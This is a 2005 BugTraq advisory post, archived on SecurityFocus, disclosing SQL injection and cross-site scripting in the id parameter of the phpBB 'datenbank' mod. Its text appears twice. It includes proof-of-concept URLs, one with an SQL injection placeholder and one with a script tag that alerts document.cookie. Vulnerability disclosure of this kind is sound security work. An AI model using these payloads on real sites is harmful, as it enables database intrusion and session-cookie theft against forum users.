BugTraq
Back to list
|
Post reply
phpBB datenbank mod has XSS/SQL Injection in the id variable
Apr 16 2005 08:30AM
tom cruise (the n3t gmail com)
vulnerable mod:
datenbank
explaination:
you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable inside the mod.php (mod-datenbank)
exploit:
http://[target]/phpBB/moddb/mod.php?id='[SQL Injection]
http://[target]/phpBB/moddb/mod.php?id='><script>alert(document.co
okie)
</script>
this bugs discovered by : neO
SGT SecurityGurus Team
www.securitygurus.net
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
vulnerable mod:
datenbank
explaination:
you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable inside the mod.php (mod-datenbank)
exploit:
http://[target]/phpBB/moddb/mod.php?id='[SQL Injection]
http://[target]/phpBB/moddb/mod.php?id='><script>alert(document.co
okie)
</script>
this bugs discovered by : neO
SGT SecurityGurus Team
www.securitygurus.net
[ reply ]